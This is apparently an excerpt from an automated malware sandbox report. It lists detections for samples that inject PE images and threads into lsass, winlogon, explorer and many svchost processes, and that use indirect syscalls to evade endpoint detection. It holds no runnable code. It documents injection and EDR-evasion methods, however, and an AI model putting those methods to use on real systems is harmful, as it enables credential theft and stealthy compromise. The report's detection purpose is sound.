        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 2537C620000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29B59750000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20CAB570000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BBF95A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D49EEE0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 8460000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23014DD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21744F70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F02ED50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19985DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10740000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 14891430000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2006A1D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C3C6250000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25DA5020000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 145F6100000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 231111B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 14249B00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 17C7A020000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 17C7AAB0000 protect: page execute and read and write
        Contains functionality to inject code into remote processes
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,28_2_0000000140001C88
        Creates a thread in another existing process (thread injection)
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 9172273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: BDCB273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 709A273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: B16B273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: EFFC273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: AFB8273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F7B273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C38273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8275273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 1B1D273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6AD4273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D3CA273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 73D3273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 21B273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B9FD273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 54D8273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 57DA273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 33B4273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7453273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1574273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C854273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 212A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6D54273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D895273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 433273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8E7273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1936273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3180273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD9B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA1C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D256273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 519273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1A0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B0FC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E58273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC5C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FAC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A93273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 88F9273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 857C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DEDC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A211273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9D9273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBEC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7C62273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5975273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB57273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F95A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9EEE273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2B2E273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC6E273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 846273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 14DD273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 44F7273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2ED5273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E6AF273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 84C2273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A071273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DDB273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F4C9273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A50F273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ACF273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 85DA273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1074273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7CDE273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9418273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5437273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9143273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6A1D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C625273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A502273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F610273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 111B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 49B0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7A02273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7AAB273C
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Users\user\AppData\Roaming\LB311.exeNtQuerySystemInformation: Indirect: 0x7FF62EF42108Jump to behavior
        Source: C:\ProgramData\Mig\Mig.exeNtQueryInformationProcess: Indirect: 0x7FF746AEA315
        Source: C:\ProgramData\Mig\Mig.exeNtQuerySystemInformation: Indirect: 0x7FF746AB6D37
        Source: C:\Users\user\AppData\Roaming\LB311.exeNtQueryInformationProcess: Indirect: 0x7FF62EF4A43DJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeNtQuerySystemInformation: Indirect: 0x7FF62EF16D37Jump to behavior
        Source: C:\ProgramData\Mig\Mig.exeNtQueryInformationProcess: Indirect: 0x7FF746AEA43D
        Source: C:\ProgramData\Mig\Mig.exeNtQuerySystemInformation: Indirect: 0x7FF746AE2108
        Source: C:\Users\user\AppData\Roaming\LB311.exeNtQueryInformationProcess: Indirect: 0x7FF62EF4A315Jump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB16B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22382750000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E580000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB570000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8460000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10740000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 14891430000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2006A1D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C3C6250000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25DA5020000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 145F6100000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 231111B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 14249B00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C7A020000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C7AAB0000 value starts with: 4D5A
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\dialer.exeMemory written: PID: 4084 base: 8460000 value: 4D
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\AppData\Roaming\LB311.exeThread register set: target process: 4620Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB16B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22382750000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E580000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB570000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8460000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10740000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 14891430000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2006A1D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C3C6250000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25DA5020000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 145F6100000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 231111B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 14249B00000
